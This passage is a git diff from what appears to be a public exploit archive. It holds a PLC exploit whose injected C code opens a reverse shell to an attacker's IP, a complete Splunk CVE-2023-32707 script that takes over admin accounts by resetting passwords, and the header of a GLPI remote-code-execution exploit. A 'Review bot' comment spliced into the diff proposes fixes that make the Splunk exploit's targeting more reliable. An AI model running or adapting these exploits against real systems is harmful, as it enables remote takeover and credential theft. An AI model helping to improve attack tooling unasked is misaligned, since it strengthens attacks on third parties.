name=\"device_ip\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028
319378579443281515639\r\nContent-Disposition: form-data; name=\"device_port\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"device_baud\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"device_parity\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"device_data\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"device_stop\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"device_pause\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"di_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"di_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"do_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"do_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"ai_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"ai_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"aor_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"aor_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"aow_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"aow_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------169043028319378579443281515639--\r\n" + + + + + + + + # \"ladder.h\"\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include 
\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n \r\n \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n int port = "+rev_port+";\r\n struct sockaddr_in revsockaddr;\r\n\r\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n revsockaddr.sin_family = AF_INET; \r\n revsockaddr.sin_port = htons(port);\r\n revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n connect(sockt, (struct sockaddr *) &revsockaddr, \r\n sizeof(revsockaddr));\r\n dup2(sockt, 0);\r\n dup2(sockt, 1);\r\n dup2(sockt, 2);\r\n\r\n char * const argv[] = {\"/bin/sh\", NULL};\r\n execve(\"/bin/sh\", argv, NULL);\r\n\r\n return 0; \r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n" + inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data) + time.sleep(3) + # comp = x.get(compile_program) + # time.sleep(6) + # x.get(inject_dash) + # time.sleep(3) + # print('[+] Spawning Reverse Shell...') + start = x.get(run_plc_server) + time.sleep(1) + if start.status_code == 200: + print('[+] Reverse connection receveid!') + sys.exit(0) + else: + print('[+] Failed to receive connection :(') + sys.exit(0) + +auth() +injection() +connection() \ No newline at end of file diff --git a/exploits/multiple/webapps/51747.py b/exploits/multiple/webapps/51747.py new file mode 100755 index 000000000..27f1a7995 --- /dev/null +++ b/exploits/multiple/webapps/51747.py 
@@ -0,0 +1,96 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Splunk 9.0.5 - admin account take over
+# Author: [Redway Security](https://twitter.com/redwaysec))
+# Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99)
+
+#CVE: CVE-2023-32707
+
+# Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned
+# to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
+#
+# Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14.
+#
+import argparse
+import requests
+import random
+import string
+import base64
+# ignore warnings
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Parse command-line arguments
+parser = argparse.ArgumentParser(description='Splunk Authentication')
+parser.add_argument('--host', required=True, help='Splunk host or IP address')
+parser.add_argument('--username', required=True, help='Splunk username')
+parser.add_argument('--password', required=True, help='Splunk password')
+parser.add_argument('--target-user', required=True, help='Target user')
+parser.add_argument('--force-exploit', action='store_true',
+help='Force exploit')
+
+args = parser.parse_args()
+
+# Splunk server settings
+splunk_host = args.host.split(':')[0]
+splunk_username = args.username
+splunk_password = args.password
+target_user = args.target_user
+force_exploit = args.force_exploit
+
+splunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089
+user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users"
+
+credentials = f"{splunk_username}:{splunk_password}"
+base64_credentials = base64.b64encode(credentials.encode()).decode()
+headers = {
+'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0',
+'Authorization': f'Basic {base64_credentials}'
+
+}
+proxies = {
+# 'http': '[http://127.0.0.1:8080'](http://127.0.0.1:8080',
+# 'https': 'http://127.0.0.1:8080'
+}
+
+response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json",
+headers=headers, proxies=proxies, verify=False)
+
+if response.status_code == 200:
+affected_versions = ['9.0.4', '8.2.10', '8.1.13']
+user = response.json()
+splunk_version = user['generator']['version']
+# This is not a good way to compare versions.
+# There is a range of versions that are affected by this CVE, but this is just a PoC
+# 8.1.0 to 8.1.13
+# 8.2.0 to 8.2.10
+# 9.0.0 to 9.0.4
+print(f"Detected Splunk version '{splunk_version}'")
+if any(splunk_version <= value for value in affected_versions) or force_exploit:
+user_capabilities = user['entry'][0]['content']['capabilities']
+if 'edit_user' in user_capabilities:
+print(
+f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")
+new_password = ''.join(random.choice(
+string.ascii_letters + string.digits) for _ in range(8))
+change_password_payload = {
+'password': new_password,
+'force-change-pass': 0,
+'locked-out': 0
+}
+response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json",
+data=change_password_payload, headers=headers, proxies=proxies, verify=False)
+if response.status_code == 200:
+print(
+f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")
+else:
+print('Account takeover failed')
+else:
+print(
+f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")
+else:
+print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")
+else:
+print(
+f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'")
+exit(1)
\ No newline at end of file
diff --git a/exploits/php/webapps/51688.txt b/exploits/php/webapps/51688.txt
index af724604c..def854e05 100644
--- a/exploits/php/webapps/51688.txt
+++ b/exploits/php/webapps/51688.txt
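Review bot: The version gate `if any(splunk_version <= value for value in affected_versions) or force_exploit:` compares version strings lexicographically, and because `any` ranges over three unrelated branches a patched 8.2.11 or 8.1.14 still satisfies `<= '9.0.4'` while a 9.0.10 sorts below '9.0.4'; the comment just above it already admits this, so the check should parse the dotted version into an int tuple and compare only against the last-affected entry on the same major.minor branch, as in the excerpt below (a non-numeric version string would raise ValueError there — if Splunk can return such values, fall back to printing it and relying on `--force-exploit`). Two smaller points: the replacement password is drawn with `random.choice`, which is not a CSPRNG — the stdlib `secrets.choice` is the right tool — and the final error message prints `'{splunk_password}'` to stdout, putting a credential into terminal scrollback and any captured log, so the password should be dropped from that message. The trailing `exit(1)` is the interactive-site builtin; `sys.exit(1)` is the portable form.
```python
def _parse_version(text):
    """Turn '9.0.4' into (9, 0, 4) so comparisons are numeric, not lexical."""
    return tuple(int(part) for part in text.split('.'))

# … unchanged: GET request, affected_versions, splunk_version, detected-version print …
detected = _parse_version(splunk_version)
is_affected = any(
    detected[:2] == _parse_version(last_affected)[:2] and detected <= _parse_version(last_affected)
    for last_affected in affected_versions
)
if is_affected or force_exploit:
```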
@@ -14,6 +14,4 @@ Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 756 -_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register - --- Sent with https://mailfence.com Secure and private email \ No newline at end of file +_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register \ No newline at end of file diff --git a/exploits/php/webapps/51726.py b/exploits/php/webapps/51726.py new file mode 100755 index 000000000..e5b741f42 --- /dev/null +++ b/exploits/php/webapps/51726.py 
@@ -0,0 +1,418 @@ +#!/usr/bin/env python3 + +#Exploit Title: GLPI GZIP(Py3) 9.4.5 - RCE +#Date: 08-30-2021 +#Exploit Authors: Brian Peters & n3rada +#Vendor Homepage: https://glpi-project.org/ +#Software Link: https://github.com/glpi-project/glpi/releases +#Version: 0.8.5-9.4.5 +#Tested on: Exploit ran on Kali 2021. GLPI Ran on Windows 2019 +#CVE: 2020-11060 + +# Built-in imports +import argparse +import random +import re +import string +from datetime import datetime + +# Third party library imports +import requests +from lxml import html + +# https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt +PAYLOAD = 